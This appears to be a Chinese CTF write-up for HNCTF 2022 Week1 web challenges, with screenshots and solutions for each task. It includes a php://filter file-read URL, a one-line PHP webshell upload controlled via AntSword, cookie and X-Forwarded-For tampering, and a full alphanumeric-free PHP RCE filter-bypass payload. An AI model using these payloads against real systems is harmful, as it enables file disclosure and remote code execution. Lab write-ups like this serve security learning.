Week1
[HNCTF 2022 Week1]2048
f12查看源代码
data:image/s3,"s3://crabby-images/de054/de054a6b47749833f9e522f756daeb11e69693c2" alt=""
可以看出游戏的分数是score
data:image/s3,"s3://crabby-images/da9e5/da9e5d46a867c4e280d2b0fbb0c0e4f1c3abb940" alt=""
修改score的值
data:image/s3,"s3://crabby-images/0ddff/0ddff7959f19bd9c7790d8f7c9652eea9f3dbf3f" alt=""
得到flag
[HNCTF 2022 Week1]Interesting_include
得到源码
php
<?php
//WEB手要懂得搜索
//flag in ./flag.php
if(isset($_GET['filter'])){
$file = $_GET['filter'];
if(!preg_match("/flag/i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
php伪协议,构造payload:
http://node3.anna.nssctf.cn:28894/?filter=php://filter/read=convert.base64-encode/resource=flag.php
base64解码得到flag
[HNCTF 2022 Week1]easy_upload
不是,你个标签整这么吓人干嘛啊???是谁!!
data:image/s3,"s3://crabby-images/4bd8e/4bd8e9326dfe5c8bb46ebbbe11422db38622552c" alt=""
一句话木马直接挂马成功了
data:image/s3,"s3://crabby-images/b230b/b230b7d1a01145e49c200c33b5adeda153cdcfd8" alt=""
蚁剑直接连接
data:image/s3,"s3://crabby-images/d56a2/d56a2c3736aa016887719940241e00d77d6f11f9" alt=""
根目录下得到flag
[HNCTF 2022 Week1]easy_html
说饼干中好像有什么东西,那就看cookie,url转码一下,./f14g.php
,然后去访问
data:image/s3,"s3://crabby-images/22c92/22c9214231d83fb592b9988be718d3f6885ea347" alt=""
说要输入手机号登录,本来想随便输入一个的,但是只能输入十位,并且会回显nononono!
data:image/s3,"s3://crabby-images/2cc36/2cc3608f7d8d30215d46f5beec8d39d7c91b92d4" alt=""
利用burp抓包,强行输入11位数字,发包得到flag
data:image/s3,"s3://crabby-images/abc06/abc065efb577f20205d96abf164d558fc1af0637" alt=""
[HNCTF 2022 Week1]What is Web
CTRL+U往下拉
data:image/s3,"s3://crabby-images/19271/19271d8429e13ec7382ceb06a3c409082bcad758" alt=""
base64解码得到flag
[HNCTF 2022 Week1]Interesting_http
说要post a want
,那就给他发一个want
data:image/s3,"s3://crabby-images/ff51a/ff51a4e8de9fb807fdce6bc6c4d0ffb1644db710" alt=""
给了两个单词,肯定选flag,然后发包
data:image/s3,"s3://crabby-images/e7ed5/e7ed569ad610fdbd94bdf32c1efe897be2e091ab" alt=""
提示Not admin
,用burp抓包,可以看到cookie中有一个user
,值是notadmin
改成admin
data:image/s3,"s3://crabby-images/d35c4/d35c46a07eb2a2f40ec53df79bd1662b0ea361d4" alt=""
提示No location
,用XFF
打
data:image/s3,"s3://crabby-images/4f49b/4f49b20dccc6210be26b03755c29e99076b55cdd" alt=""
拿到flag
[HNCTF 2022 Week1]Challenge__rce
f12查看hint,?hint
data:image/s3,"s3://crabby-images/2d418/2d4185c4179758b675e18121682cd13c2c4c5f71" alt=""
给hint传入一个值得到源码
php
<?php
error_reporting(0);
if (isset($_GET['hint'])) {
highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
$rce = $_POST['rce'];
if (strlen($rce) <= 120) {
if (is_string($rce)) {
if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
eval($rce);
} else {
echo("Are you hack me?");
}
} else {
echo "I want string!";
}
} else {
echo "too long!";
}
}
说明这里要进行RCE,但是过滤掉了大部分东西,这里可以用的是$()+,.0123456789;=[]_{}
,那么就是自增RCE
关于自增RCE可看这篇:CTFshow-RCE极限大挑战wp
直接放payload:
rce=$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);
但是传入的时候要进行url编码
%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B
并且传入的时候要传入1
和2
,如下
data:image/s3,"s3://crabby-images/3e3b1/3e3b1b14ce4daa5a1ebd64bee5b2c413bbe511b2" alt=""
然后将2
的值为cat /ffflllaaaggg
得到flag